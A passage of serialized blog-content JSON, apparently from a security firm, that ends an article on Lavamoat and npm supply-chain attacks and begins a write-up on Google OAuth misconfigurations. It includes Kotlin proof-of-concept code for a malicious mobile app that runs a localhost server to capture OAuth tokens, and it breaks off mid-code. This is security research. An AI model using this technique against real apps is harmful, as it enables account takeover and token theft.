},\n",[99119],{"type":28,"tag":98,"props":99120,"children":99121},{"__ignoreMap":7},[99122,99134,99145,99165,99181,99188],{"type":28,"tag":116,"props":99123,"children":99124},{"class":245,"line":246},[99125,99130],{"type":28,"tag":116,"props":99126,"children":99127},{"style":563},[99128],{"type":33,"value":99129},"\"chalk\"",{"type":28,"tag":116,"props":99131,"children":99132},{"style":266},[99133],{"type":33,"value":36646},{"type":28,"tag":116,"props":99135,"children":99136},{"class":245,"line":256},[99137,99141],{"type":28,"tag":116,"props":99138,"children":99139},{"style":272},[99140],{"type":33,"value":36654},{"type":28,"tag":116,"props":99142,"children":99143},{"style":266},[99144],{"type":33,"value":36646},{"type":28,"tag":116,"props":99146,"children":99147},{"class":245,"line":293},[99148,99153,99157,99161],{"type":28,"tag":116,"props":99149,"children":99150},{"style":272},[99151],{"type":33,"value":99152},"        \"navigator.userAgent\"",{"type":28,"tag":116,"props":99154,"children":99155},{"style":266},[99156],{"type":33,"value":14994},{"type":28,"tag":116,"props":99158,"children":99159},{"style":376},[99160],{"type":33,"value":3664},{"type":28,"tag":116,"props":99162,"children":99163},{"style":266},[99164],{"type":33,"value":3178},{"type":28,"tag":116,"props":99166,"children":99167},{"class":245,"line":361},[99168,99173,99177],{"type":28,"tag":116,"props":99169,"children":99170},{"style":272},[99171],{"type":33,"value":99172},"        \"navigator.userAgentData\"",{"type":28,"tag":116,"props":99174,"children":99175},{"style":266},[99176],{"type":33,"value":14994},{"type":28,"tag":116,"props":99178,"children":99179},{"style":376},[99180],{"type":33,"value":36815},{"type":28,"tag":116,"props":99182,"children":99183},{"class":245,"line":387},[99184],{"type":28,"tag":116,"props":99185,"children":99186},{"style":266},[99187],{"type":33,"value":2444},{"type":28,"tag":116,"props":99189,"children":99190},{"class":245,"line":400},[99191],{"type":28,"tag":116,"props":99192,"children":99193},{"style":266},[99194],{"type":33,"value":25036},{"type":28,"tag":29,"props":99196,"children":99197},{},[99198,99200,99206],{"type":33,"value":99199},"That means that the chalk dependency can only access these two global attributes from ",{"type":28,"tag":98,"props":99201,"children":99203},{"className":99202},[],[99204],{"type":33,"value":99205},"navigator",{"type":33,"value":141},{"type":28,"tag":29,"props":99208,"children":99209},{},[99210,99212,99218],{"type":33,"value":99211},"When the compromised dApp would execute the malicious payload of ",{"type":28,"tag":98,"props":99213,"children":99215},{"className":99214},[],[99216],{"type":33,"value":99217},"chalk v5.6.1",{"type":33,"value":99219}," it would fail due to insufficient permissions:",{"type":28,"tag":29,"props":99221,"children":99222},{},[99223],{"type":28,"tag":206,"props":99224,"children":99226},{"alt":50198,"src":99225},"/posts/supply-chain-attcks/error.png",[],{"type":28,"tag":29,"props":99228,"children":99229},{},[99230,99232,99237],{"type":33,"value":99231},"This error shows that the malware failed since it cannot redefine ",{"type":28,"tag":98,"props":99233,"children":99235},{"className":99234},[],[99236],{"type":33,"value":33729},{"type":33,"value":25123},{"type":28,"tag":234,"props":99239,"children":99241},{"code":99240},"TypeError#1: Cannot define property fetch, object is not extensible\n",[99242],{"type":28,"tag":98,"props":99243,"children":99244},{"__ignoreMap":7},[99245],{"type":33,"value":99240},{"type":28,"tag":63,"props":99247,"children":99249},{"id":99248},"lavamoat-in-practice",[99250],{"type":33,"value":99251},"Lavamoat In Practice",{"type":28,"tag":29,"props":99253,"children":99254},{},[99255,99257,99264],{"type":33,"value":99256},"The OtterSec team audited the Lavamoat Webpack Plugin in late 2024 and identified vulnerabilities that attackers could abuse to bypass Lavamoat protections (",{"type":28,"tag":87,"props":99258,"children":99261},{"href":99259,"rel":99260},"https://osec.io/reports/lavamoat_audit_final.pdf",[91],[99262],{"type":33,"value":99263},"see the audit report",{"type":33,"value":1484},{"type":28,"tag":29,"props":99266,"children":99267},{},[99268],{"type":33,"value":99269},"Like any security tool, it isn’t flawless, but it represents an important shift: it minimizes what malicious code can do, rather than assuming every dependency deserves full trust. Supply-chain attacks are designed to hit as many victims as possible, not to target individual organizations. By implementing Lavamoat, you dramatically reduce your exposure and force attackers to look elsewhere.",{"type":28,"tag":63,"props":99271,"children":99272},{"id":75417},[99273],{"type":33,"value":75420},{"type":28,"tag":29,"props":99275,"children":99276},{},[99277],{"type":33,"value":99278},"The NPM incident may not have caused massive losses, but it was a clear proof-of-concept for how fragile the current model is. Supply-chain attacks will happen again, and relying on registry security alone is not enough.",{"type":28,"tag":29,"props":99280,"children":99281},{},[99282,99284,99289],{"type":33,"value":99283},"Version pinning and ",{"type":28,"tag":98,"props":99285,"children":99287},{"className":99286},[],[99288],{"type":33,"value":98725},{"type":33,"value":99290}," provide a baseline defense, but Lavamoat represents the next step: enforcing least privilege for dependencies. If you’re building critical applications, adopting and contributing to Lavamoat is one of the most effective ways to stay ahead.",{"type":28,"tag":2516,"props":99292,"children":99293},{},[99294],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":99296},[99297,99300,99301,99310,99311],{"id":96914,"depth":256,"text":96917,"children":99298},[99299],{"id":98548,"depth":293,"text":98551},{"id":98559,"depth":256,"text":98562},{"id":98575,"depth":256,"text":98578,"children":99302},[99303,99305,99307,99309],{"id":98586,"depth":293,"text":99304},"1. Version pinning in package.json",{"id":98716,"depth":293,"text":99306},"2. Use npm ci",{"id":98753,"depth":293,"text":99308},"3. Implement Lavamoat",{"id":99044,"depth":293,"text":99047},{"id":99248,"depth":256,"text":99251},{"id":75417,"depth":256,"text":75420},"content:blog:2025-09-13-how-to-survive-supply-chain-attacks.md","blog/2025-09-13-how-to-survive-supply-chain-attacks.md","blog/2025-09-13-how-to-survive-supply-chain-attacks",{"_path":99316,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":99317,"description":99318,"date":99319,"author":99320,"image":99321,"isFeatured":19,"onBlogPage":19,"tags":99323,"body":99326,"_type":2534,"_id":101657,"_source":2536,"_file":101658,"_stem":101659,"_extension":2539},"/blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations","How We Broke Exchanges: A Deep Dive Into Authentication And Client-Side Bugs","OAuth misconfigurations show how common dev settings can lead to account takeovers. Explore real cases where failing to account for differences between desktop and mobile environments left SDKs, exchanges, and wallets vulnerable to exploits.","2025-10-16T12:00:00.000Z",[12,13],{"src":99322,"width":17,"height":18},"/posts/oauth-misconfigurations/title.png",[99324,99325],"oAuth","exchanges",{"type":25,"children":99327,"toc":101644},[99328,99334,99339,99345,99365,99371,99376,99389,99394,99402,99416,99425,99434,99448,99456,99467,99527,99533,99545,99594,99600,99605,99618,99625,99636,99656,99675,99696,99702,99715,99720,99726,99745,100370,100375,100388,101249,101254,101259,101265,101270,101276,101281,101294,101334,101340,101353,101358,101391,101396,101401,101426,101431,101443,101600,101605,101609,101621,101626,101630,101635,101640],{"type":28,"tag":63,"props":99329,"children":99331},{"id":99330},"exploiting-oauth",[99332],{"type":33,"value":99333},"Exploiting OAuth",{"type":28,"tag":29,"props":99335,"children":99336},{},[99337],{"type":33,"value":99338},"Our main research focus was related to recent vulnerabilities we found in some of our audits. One common issue we find is related to OAuth misconfigurations that can be exploited to achieve account takeover. To understand the vulnerability and the exploit itself, we first need to dig into the different OAuth flows and the configurations that can be made in the Google Cloud Console.",{"type":28,"tag":75,"props":99340,"children":99342},{"id":99341},"google-authentication-flows",[99343],{"type":33,"value":99344},"Google Authentication Flows",{"type":28,"tag":29,"props":99346,"children":99347},{},[99348,99350,99356,99358,99363],{"type":33,"value":99349},"During our research, we identified various Google Authentication flows that require different exploitation methods. The new/most recent flow is called GSI, which mainly uses ",{"type":28,"tag":98,"props":99351,"children":99353},{"className":99352},[],[99354],{"type":33,"value":99355},"postMessage",{"type":33,"value":99357}," for communication with the Relying Party (RP), and the old one mostly uses ",{"type":28,"tag":98,"props":99359,"children":99361},{"className":99360},[],[99362],{"type":33,"value":69386},{"type":33,"value":99364}," to send the token back to the RP.",{"type":28,"tag":443,"props":99366,"children":99368},{"id":99367},"gsi-new-flow",[99369],{"type":33,"value":99370},"GSI (New Flow)",{"type":28,"tag":29,"props":99372,"children":99373},{},[99374],{"type":33,"value":99375},"The GSI flow also has two ways to authenticate the user to the RP:",{"type":28,"tag":2108,"props":99377,"children":99378},{},[99379,99384],{"type":28,"tag":459,"props":99380,"children":99381},{},[99382],{"type":33,"value":99383},"Using FedCM API",{"type":28,"tag":459,"props":99385,"children":99386},{},[99387],{"type":33,"value":99388},"Without using FedCM API",{"type":28,"tag":29,"props":99390,"children":99391},{},[99392],{"type":33,"value":99393},"FedCM (Federated Credentials Manager) is a new browser API that lets users authenticate natively to an RP using a third-party IdP.",{"type":28,"tag":29,"props":99395,"children":99396},{},[99397],{"type":28,"tag":4995,"props":99398,"children":99399},{},[99400],{"type":33,"value":99401},"FedCM Method",{"type":28,"tag":29,"props":99403,"children":99404},{},[99405,99407,99414],{"type":33,"value":99406},"The FedCM method basically follows this ",{"type":28,"tag":87,"props":99408,"children":99411},{"href":99409,"rel":99410},"https://privacysandbox.google.com/cookies/fedcm/why#user-interaction",[91],[99412],{"type":33,"value":99413},"user experience",{"type":33,"value":99415},". Users can log in by clicking a login button (which will open a \"choose your account\" prompt window) or by 1-tap UX (see images below).",{"type":28,"tag":29,"props":99417,"children":99418},{},[99419,99421],{"type":33,"value":99420},"The normal flow, clicking the \"sign in\" button:\n",{"type":28,"tag":206,"props":99422,"children":99424},{"alt":50198,"src":99423},"/posts/oauth-misconfigurations/image1.png",[],{"type":28,"tag":29,"props":99426,"children":99427},{},[99428,99430],{"type":33,"value":99429},"One-Tap popup shown when you open the page:\n",{"type":28,"tag":206,"props":99431,"children":99433},{"alt":50198,"src":99432},"/posts/oauth-misconfigurations/image2.png",[],{"type":28,"tag":29,"props":99435,"children":99436},{},[99437,99439,99446],{"type":33,"value":99438},"Both flows use FedCM API to authenticate using Google IdP service, which makes some CORS requests to the IdP server to return the token. After authenticating the first time, when the user returns to the same website after some time, it is possible to automatically reauthenticate using ",{"type":28,"tag":87,"props":99440,"children":99443},{"href":99441,"rel":99442},"https://github.com/w3c-fedid/FedCM/issues/429",[91],[99444],{"type":33,"value":99445},"FedCM auto-reauthentication",{"type":33,"value":99447},", which has certain preconditions that must be met.",{"type":28,"tag":29,"props":99449,"children":99450},{},[99451],{"type":28,"tag":4995,"props":99452,"children":99453},{},[99454],{"type":33,"value":99455},"Non-FedCM Method",{"type":28,"tag":29,"props":99457,"children":99458},{},[99459,99461,99466],{"type":33,"value":99460},"This method uses a popup window (or iframe) to open the Google OAuth consent page and return the token via ",{"type":28,"tag":98,"props":99462,"children":99464},{"className":99463},[],[99465],{"type":33,"value":99355},{"type":33,"value":4160},{"type":28,"tag":455,"props":99468,"children":99469},{},[99470,99475,99499,99504,99515],{"type":28,"tag":459,"props":99471,"children":99472},{},[99473],{"type":33,"value":99474},"The user clicks the sign in button",{"type":28,"tag":459,"props":99476,"children":99477},{},[99478,99480,99486,99488,99493,99494],{"type":33,"value":99479},"RP opens a popup/iframe to ",{"type":28,"tag":87,"props":99481,"children":99484},{"href":99482,"rel":99483},"https://accounts.google.com/o/oauth2/v2/auth",[91],[99485],{"type":33,"value":99482},{"type":33,"value":99487}," with some important parameters like ",{"type":28,"tag":98,"props":99489,"children":99491},{"className":99490},[],[99492],{"type":33,"value":69218},{"type":33,"value":10659},{"type":28,"tag":98,"props":99495,"children":99497},{"className":99496},[],[99498],{"type":33,"value":39755},{"type":28,"tag":459,"props":99500,"children":99501},{},[99502],{"type":33,"value":99503},"The user clicks the \"Continue\" button to authorize authentication",{"type":28,"tag":459,"props":99505,"children":99506},{},[99507,99509],{"type":33,"value":99508},"They get redirected to ",{"type":28,"tag":87,"props":99510,"children":99513},{"href":99511,"rel":99512},"https://accounts.google.com/gsi/transform",[91],[99514],{"type":33,"value":99511},{"type":28,"tag":459,"props":99516,"children":99517},{},[99518,99520,99525],{"type":33,"value":99519},"/gsi/transform sends the token back to the RP via ",{"type":28,"tag":98,"props":99521,"children":99523},{"className":99522},[],[99524],{"type":33,"value":99355},{"type":33,"value":99526}," (after some SYN/ACK messages)",{"type":28,"tag":443,"props":99528,"children":99530},{"id":99529},"oauth-20-old-flow",[99531],{"type":33,"value":99532},"OAuth 2.0 Old Flow",{"type":28,"tag":29,"props":99534,"children":99535},{},[99536,99538,99543],{"type":33,"value":99537},"The old flow also redirects the user to the Google OAuth consent page and then returns the token via a ",{"type":28,"tag":98,"props":99539,"children":99541},{"className":99540},[],[99542],{"type":33,"value":69386},{"type":33,"value":99544}," provided in the URL and validated by a whitelist configuration:",{"type":28,"tag":455,"props":99546,"children":99547},{},[99548,99552,99573,99577],{"type":28,"tag":459,"props":99549,"children":99550},{},[99551],{"type":33,"value":99474},{"type":28,"tag":459,"props":99553,"children":99554},{},[99555,99556,99561,99562,99567,99568],{"type":33,"value":99479},{"type":28,"tag":87,"props":99557,"children":99559},{"href":99482,"rel":99558},[91],[99560],{"type":33,"value":99482},{"type":33,"value":99487},{"type":28,"tag":98,"props":99563,"children":99565},{"className":99564},[],[99566],{"type":33,"value":69218},{"type":33,"value":10659},{"type":28,"tag":98,"props":99569,"children":99571},{"className":99570},[],[99572],{"type":33,"value":69386},{"type":28,"tag":459,"props":99574,"children":99575},{},[99576],{"type":33,"value":99503},{"type":28,"tag":459,"props":99578,"children":99579},{},[99580,99581,99586,99588],{"type":33,"value":99508},{"type":28,"tag":98,"props":99582,"children":99584},{"className":99583},[],[99585],{"type":33,"value":69386},{"type":33,"value":99587}," with the token in the query parameters or ",{"type":28,"tag":98,"props":99589,"children":99591},{"className":99590},[],[99592],{"type":33,"value":99593},"location.hash",{"type":28,"tag":443,"props":99595,"children":99597},{"id":99596},"different-configurations",[99598],{"type":33,"value":99599},"Different Configurations",{"type":28,"tag":29,"props":99601,"children":99602},{},[99603],{"type":33,"value":99604},"These two flows must be configured differently in the Google Cloud Console. There are two whitelist configurations that we can control:",{"type":28,"tag":2108,"props":99606,"children":99607},{},[99608,99613],{"type":28,"tag":459,"props":99609,"children":99610},{},[99611],{"type":33,"value":99612},"Authorized origins",{"type":28,"tag":459,"props":99614,"children":99615},{},[99616],{"type":33,"value":99617},"Authorized redirect URIs",{"type":28,"tag":29,"props":99619,"children":99620},{},[99621],{"type":28,"tag":206,"props":99622,"children":99624},{"alt":50198,"src":99623},"/posts/oauth-misconfigurations/image3.png",[],{"type":28,"tag":29,"props":99626,"children":99627},{},[99628,99630,99635],{"type":33,"value":99629},"The described GSI flow doesn't use any redirection to send the token back to the RP, so the authorized redirect URI is not that important in the GSI flow. It uses the authorized origins to verify if the RP page is actually allowed to be authenticated using that ",{"type":28,"tag":98,"props":99631,"children":99633},{"className":99632},[],[99634],{"type":33,"value":69218},{"type":33,"value":141},{"type":28,"tag":29,"props":99637,"children":99638},{},[99639,99641,99647,99649,99654],{"type":33,"value":99640},"The actual verification in the GSI flow happens in the CORS requests made by FedCM or in ",{"type":28,"tag":98,"props":99642,"children":99644},{"className":99643},[],[99645],{"type":33,"value":99646},"/oauth2/v2/auth",{"type":33,"value":99648}," by checking the ",{"type":28,"tag":98,"props":99650,"children":99652},{"className":99651},[],[99653],{"type":33,"value":39755},{"type":33,"value":99655}," query parameter.",{"type":28,"tag":29,"props":99657,"children":99658},{},[99659,99661,99666,99668,99673],{"type":33,"value":99660},"In the old flow, the ",{"type":28,"tag":98,"props":99662,"children":99664},{"className":99663},[],[99665],{"type":33,"value":69386},{"type":33,"value":99667}," parameter passed in the ",{"type":28,"tag":98,"props":99669,"children":99671},{"className":99670},[],[99672],{"type":33,"value":99646},{"type":33,"value":99674}," endpoint is validated against the authorized redirect URIs.",{"type":28,"tag":29,"props":99676,"children":99677},{},[99678,99680,99685,99687,99694],{"type":33,"value":99679},"Note that the new GSI flow can also have a different flow using ",{"type":28,"tag":98,"props":99681,"children":99683},{"className":99682},[],[99684],{"type":33,"value":69386},{"type":33,"value":99686}," validation. To execute this flow, you need to specify ",{"type":28,"tag":87,"props":99688,"children":99691},{"href":99689,"rel":99690},"https://developers.google.com/identity/gsi/web/reference/js-reference#login_uri",[91],[99692],{"type":33,"value":99693},"login_uri",{"type":33,"value":99695}," while using the SDK.",{"type":28,"tag":75,"props":99697,"children":99699},{"id":99698},"localhost-exploit",[99700],{"type":33,"value":99701},"Localhost Exploit",{"type":28,"tag":29,"props":99703,"children":99704},{},[99705,99707,99713],{"type":33,"value":99706},"During one of our audits, we found a bug related to how developers test the OAuth flow in their development environment. Developers often whitelist the ",{"type":28,"tag":98,"props":99708,"children":99710},{"className":99709},[],[99711],{"type":33,"value":99712},"localhost",{"type":33,"value":99714}," origin because it is considered trusted for local testing.",{"type":28,"tag":29,"props":99716,"children":99717},{},[99718],{"type":33,"value":99719},"Actually, this is partially true, as it depends on which security assumptions you make. This can be an issue in a mobile environment, as mobile apps can open localhost webservers without many permissions, and having a malicious app installed is not considered a significant issue on mobile since all applications are sandboxed. This configuration allows a malicious application to \"escape\" the sandbox and attack another system.",{"type":28,"tag":443,"props":99721,"children":99723},{"id":99722},"exploit",[99724],{"type":33,"value":99725},"Exploit",{"type":28,"tag":29,"props":99727,"children":99728},{},[99729,99731,99736,99737,99743],{"type":33,"value":99730},"To exploit this misconfiguration, we first needed to understand the OAuth flow used by the target. If the OAuth implementation follows a standard flow without using Google Sign-In (GSI), we can extract the token via ",{"type":28,"tag":98,"props":99732,"children":99734},{"className":99733},[],[99735],{"type":33,"value":99593},{"type":33,"value":12800},{"type":28,"tag":98,"props":99738,"children":99740},{"className":99739},[],[99741],{"type":33,"value":99742},"location.search",{"type":33,"value":99744},". To achieve this, we developed a Kotlin application that spins up a local web server:",{"type":28,"tag":234,"props":99746,"children":99750},{"className":99747,"code":99748,"language":99749,"meta":7,"style":7},"language-kt shiki shiki-themes slack-dark"," override fun onCreate(savedInstanceState: Bundle?){\n        super.onCreate(savedInstanceState)\n\n        // Start the Ktor web server\n        CoroutineScope(Dispatchers.IO).launch {\n            try {\n                startWebServer()\n                Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n            } catch (e: Exception) {\n                Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n            }\n        }\n\n        // Open the Google OAuth page\n        val googleOAuthUrl = \"https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=redacted&redirect_uri=http://localhost:3000/auth/index.html&response_type=id_token&scope=email&nonce=redacted&prompt=select_account&service=lso&o2v=2&flowName=GeneralOAuthFlow\"\n        val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(googleOAuthUrl))\n        startActivity(browserIntent)\n    }\n\n    private fun startWebServer() {\n        embeddedServer(CIO, port = 3000) {\n            routing {\n                get(\"{...}\") {\n                    call.respondHtml {\n                        head {\n                            meta(charset = \"UTF-8\")\n                            meta(name = \"viewport\", content = \"width=device-width, initial-scale=1.0\")\n                            title(\"OAuth Redirect\")\n                        }\n                        body {\n                            h1 { +\"Google OAuth Redirect\" }\n                            script {\n                                +\"document.body.innerText = location.hash;\"\n                            }\n                        }\n                    }\n                }\n            }\n        }.start(wait = true)\n    }\n","kt",[99751],{"type":28,"tag":98,"props":99752,"children":99753},{"__ignoreMap":7},[99754,99783,99802,99809,99816,99835,99846,99857,99888,99911,99958,99965,99972,99979,99986,100006,100037,100048,100055,100062,100081,100104,100115,100134,100149,100160,100183,100218,100237,100244,100255,100278,100289,100301,100308,100315,100322,100329,100336,100363],{"type":28,"tag":116,"props":99755,"children":99756},{"class":245,"line":246},[99757,99762,99766,99770,99774,99778],{"type":28,"tag":116,"props":99758,"children":99759},{"style":376},[99760],{"type":33,"value":99761}," override",{"type":28,"tag":116,"props":99763,"children":99764},{"style":376},[99765],{"type":33,"value":5878},{"type":28,"tag":116,"props":99767,"children":99768},{"style":282},[99769],{"type":33,"value":70072},{"type":28,"tag":116,"props":99771,"children":99772},{"style":266},[99773],{"type":33,"value":70077},{"type":28,"tag":116,"props":99775,"children":99776},{"style":339},[99777],{"type":33,"value":70082},{"type":28,"tag":116,"props":99779,"children":99780},{"style":266},[99781],{"type":33,"value":99782},"?){\n",{"type":28,"tag":116,"props":99784,"children":99785},{"class":245,"line":256},[99786,99790,99794,99798],{"type":28,"tag":116,"props":99787,"children":99788},{"style":376},[99789],{"type":33,"value":70095},{"type":28,"tag":116,"props":99791,"children":99792},{"style":266},[99793],{"type":33,"value":141},{"type":28,"tag":116,"props":99795,"children":99796},{"style":282},[99797],{"type":33,"value":70104},{"type":28,"tag":116,"props":99799,"children":99800},{"style":266},[99801],{"type":33,"value":70109},{"type":28,"tag":116,"props":99803,"children":99804},{"class":245,"line":293},[99805],{"type":28,"tag":116,"props":99806,"children":99807},{"emptyLinePlaceholder":19},[99808],{"type":33,"value":1044},{"type":28,"tag":116,"props":99810,"children":99811},{"class":245,"line":361},[99812],{"type":28,"tag":116,"props":99813,"children":99814},{"style":250},[99815],{"type":33,"value":70124},{"type":28,"tag":116,"props":99817,"children":99818},{"class":245,"line":387},[99819,99823,99827,99831],{"type":28,"tag":116,"props":99820,"children":99821},{"style":282},[99822],{"type":33,"value":70132},{"type":28,"tag":116,"props":99824,"children":99825},{"style":266},[99826],{"type":33,"value":70137},{"type":28,"tag":116,"props":99828,"children":99829},{"style":282},[99830],{"type":33,"value":70142},{"type":28,"tag":116,"props":99832,"children":99833},{"style":266},[99834],{"type":33,"value":1291},{"type":28,"tag":116,"props":99836,"children":99837},{"class":245,"line":400},[99838,99842],{"type":28,"tag":116,"props":99839,"children":99840},{"style":260},[99841],{"type":33,"value":70154},{"type":28,"tag":116,"props":99843,"children":99844},{"style":266},[99845],{"type":33,"value":1291},{"type":28,"tag":116,"props":99847,"children":99848},{"class":245,"line":614},[99849,99853],{"type":28,"tag":116,"props":99850,"children":99851},{"style":282},[99852],{"type":33,"value":70166},{"type":28,"tag":116,"props":99854,"children":99855},{"style":266},[99856],{"type":33,"value":7407},{"type":28,"tag":116,"props":99858,"children":99859},{"class":245,"line":631},[99860,99864,99868,99872,99876,99880,99884],{"type":28,"tag":116,"props":99861,"children":99862},{"style":266},[99863],{"type":33,"value":70178},{"type":28,"tag":116,"props":99865,"children":99866},{"style":282},[99867],{"type":33,"value":70183},{"type":28,"tag":116,"props":99869,"children":99870},{"style":266},[99871],{"type":33,"value":313},{"type":28,"tag":116,"props":99873,"children":99874},{"style":563},[99875],{"type":33,"value":70192},{"type":28,"tag":116,"props":99877,"children":99878},{"style":266},[99879],{"type":33,"value":825},{"type":28,"tag":116,"props":99881,"children":99882},{"style":563},[99883],{"type":33,"value":70201},{"type":28,"tag":116,"props":99885,"children":99886},{"style":266},[99887],{"type":33,"value":2830},{"type":28,"tag":116,"props":99889,"children":99890},{"class":245,"line":665},[99891,99895,99899,99903,99907],{"type":28,"tag":116,"props":99892,"children":99893},{"style":266},[99894],{"type":33,"value":70213},{"type":28,"tag":116,"props":99896,"children":99897},{"style":376},[99898],{"type":33,"value":48033},{"type":28,"tag":116,"props":99900,"children":99901},{"style":266},[99902],{"type":33,"value":70222},{"type":28,"tag":116,"props":99904,"children":99905},{"style":339},[99906],{"type":33,"value":70227},{"type":28,"tag":116,"props":99908,"children":99909},{"style":266},[99910],{"type":33,"value":844},{"type":28,"tag":116,"props":99912,"children":99913},{"class":245,"line":713},[99914,99918,99922,99926,99930,99934,99938,99942,99946,99950,99954],{"type":28,"tag":116,"props":99915,"children":99916},{"style":266},[99917],{"type":33,"value":70178},{"type":28,"tag":116,"props":99919,"children":99920},{"style":282},[99921],{"type":33,"value":1413},{"type":28,"tag":116,"props":99923,"children":99924},{"style":266},[99925],{"type":33,"value":313},{"type":28,"tag":116,"props":99927,"children":99928},{"style":563},[99929],{"type":33,"value":70192},{"type":28,"tag":116,"props":99931,"children":99932},{"style":266},[99933],{"type":33,"value":825},{"type":28,"tag":116,"props":99935,"children":99936},{"style":563},[99937],{"type":33,"value":70259},{"type":28,"tag":116,"props":99939,"children":99940},{"style":376},[99941],{"type":33,"value":867},{"type":28,"tag":116,"props":99943,"children":99944},{"style":370},[99945],{"type":33,"value":70268},{"type":28,"tag":116,"props":99947,"children":99948},{"style":376},[99949],{"type":33,"value":885},{"type":28,"tag":116,"props":99951,"children":99952},{"style":563},[99953],{"type":33,"value":2240},{"type":28,"tag":116,"props":99955,"children":99956},{"style":266},[99957],{"type":33,"value":70281},{"type":28,"tag":116,"props":99959,"children":99960},{"class":245,"line":750},[99961],{"type":28,"tag":116,"props":99962,"children":99963},{"style":266},[99964],{"type":33,"value":58503},{"type":28,"tag":116,"props":99966,"children":99967},{"class":245,"line":779},[99968],{"type":28,"tag":116,"props":99969,"children":99970},{"style":266},[99971],{"type":33,"value":1954},{"type":28,"tag":116,"props":99973,"children":99974},{"class":245,"line":796},[99975],{"type":28,"tag":116,"props":99976,"children":99977},{"emptyLinePlaceholder":19},[99978],{"type":33,"value":1044},{"type":28,"tag":116,"props":99980,"children":99981},{"class":245,"line":847},[99982],{"type":28,"tag":116,"props":99983,"children":99984},{"style":250},[99985],{"type":33,"value":70310},{"type":28,"tag":116,"props":99987,"children":99988},{"class":245,"line":898},[99989,99993,99997,100001],{"type":28,"tag":116,"props":99990,"children":99991},{"style":376},[99992],{"type":33,"value":70318},{"type":28,"tag":116,"props":99994,"children":99995},{"style":266},[99996],{"type":33,"value":70323},{"type":28,"tag":116,"props":99998,"children":99999},{"style":370},[100000],{"type":33,"value":373},{"type":28,"tag":116,"props":100002,"children":100003},{"style":563},[100004],{"type":33,"value":100005}," \"https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=redacted&redirect_uri=http://localhost:3000/auth/index.html&response_type=id_token&scope=email&nonce=redacted&prompt=select_account&service=lso&o2v=2&flowName=GeneralOAuthFlow\"\n",{"type":28,"tag":116,"props":100007,"children":100008},{"class":245,"line":907},[100009,100013,100017,100021,100025,100029,100033],{"type":28,"tag":116,"props":100010,"children":100011},{"style":376},[100012],{"type":33,"value":70318},{"type":28,"tag":116,"props":100014,"children":100015},{"style":266},[100016],{"type":33,"value":70344},{"type":28,"tag":116,"props":100018,"children":100019},{"style":370},[100020],{"type":33,"value":373},{"type":28,"tag":116,"props":100022,"children":100023},{"style":282},[100024],{"type":33,"value":70353},{"type":28,"tag":116,"props":100026,"children":100027},{"style":266},[100028],{"type":33,"value":70358},{"type":28,"tag":116,"props":100030,"children":100031},{"style":282},[100032],{"type":33,"value":38833},{"type":28,"tag":116,"props":100034,"children":100035},{"style":266},[100036],{"type":33,"value":70367},{"type":28,"tag":116,"props":100038,"children":100039},{"class":245,"line":981},[100040,100044],{"type":28,"tag":116,"props":100041,"children":100042},{"style":282},[100043],{"type":33,"value":70375},{"type":28,"tag":116,"props":100045,"children":100046},{"style":266},[100047],{"type":33,"value":70380},{"type":28,"tag":116,"props":100049,"children":100050},{"class":245,"line":1011},[100051],{"type":28,"tag":116,"props":100052,"children":100053},{"style":266},[100054],{"type":33,"value":3025},{"type":28,"tag":116,"props":100056,"children":100057},{"class":245,"line":1029},[100058],{"type":28,"tag":116,"props":100059,"children":100060},{"emptyLinePlaceholder":19},[100061],{"type":33,"value":1044},{"type":28,"tag":116,"props":100063,"children":100064},{"class":245,"line":1038},[100065,100069,100073,100077],{"type":28,"tag":116,"props":100066,"children":100067},{"style":376},[100068],{"type":33,"value":2164},{"type":28,"tag":116,"props":100070,"children":100071},{"style":376},[100072],{"type":33,"value":5878},{"type":28,"tag":116,"props":100074,"children":100075},{"style":282},[100076],{"type":33,"value":70410},{"type":28,"tag":116,"props":100078,"children":100079},{"style":266},[100080],{"type":33,"value":1068},{"type":28,"tag":116,"props":100082,"children":100083},{"class":245,"line":1047},[100084,100088,100092,100096,100100],{"type":28,"tag":116,"props":100085,"children":100086},{"style":282},[100087],{"type":33,"value":70422},{"type":28,"tag":116,"props":100089,"children":100090},{"style":266},[100091],{"type":33,"value":70427},{"type":28,"tag":116,"props":100093,"children":100094},{"style":370},[100095],{"type":33,"value":373},{"type":28,"tag":116,"props":100097,"children":100098},{"style":350},[100099],{"type":33,"value":70436},{"type":28,"tag":116,"props":100101,"children":100102},{"style":266},[100103],{"type":33,"value":844},{"type":28,"tag":116,"props":100105,"children":100106},{"class":245,"line":1071},[100107,100111],{"type":28,"tag":116,"props":100108,"children":100109},{"style":282},[100110],{"type":33,"value":70448},{"type":28,"tag":116,"props":100112,"children":100113},{"style":266},[100114],{"type":33,"value":1291},{"type":28,"tag":116,"props":100116,"children":100117},{"class":245,"line":1137},[100118,100122,100126,100130],{"type":28,"tag":116,"props":100119,"children":100120},{"style":376},[100121],{"type":33,"value":70460},{"type":28,"tag":116,"props":100123,"children":100124},{"style":266},[100125],{"type":33,"value":313},{"type":28,"tag":116,"props":100127,"children":100128},{"style":563},[100129],{"type":33,"value":70469},{"type":28,"tag":116,"props":100131,"children":100132},{"style":266},[100133],{"type":33,"value":844},{"type":28,"tag":116,"props":100135,"children":100136},{"class":245,"line":1181},[100137,100141,100145],{"type":28,"tag":116,"props":100138,"children":100139},{"style":266},[100140],{"type":33,"value":70481},{"type":28,"tag":116,"props":100142,"children":100143},{"style":282},[100144],{"type":33,"value":70486},{"type":28,"tag":116,"props":100146,"children":100147},{"style":266},[100148],{"type":33,"value":1291},{"type":28,"tag":116,"props":100150,"children":100151},{"class":245,"line":1212},[100152,100156],{"type":28,"tag":116,"props":100153,"children":100154},{"style":282},[100155],{"type":33,"value":70498},{"type":28,"tag":116,"props":100157,"children":100158},{"style":266},[100159],{"type":33,"value":1291},{"type":28,"tag":116,"props":100161,"children":100162},{"class":245,"line":1254},[100163,100167,100171,100175,100179],{"type":28,"tag":116,"props":100164,"children":100165},{"style":282},[100166],{"type":33,"value":70510},{"type":28,"tag":116,"props":100168,"children":100169},{"style":266},[100170],{"type":33,"value":70515},{"type":28,"tag":116,"props":100172,"children":100173},{"style":370},[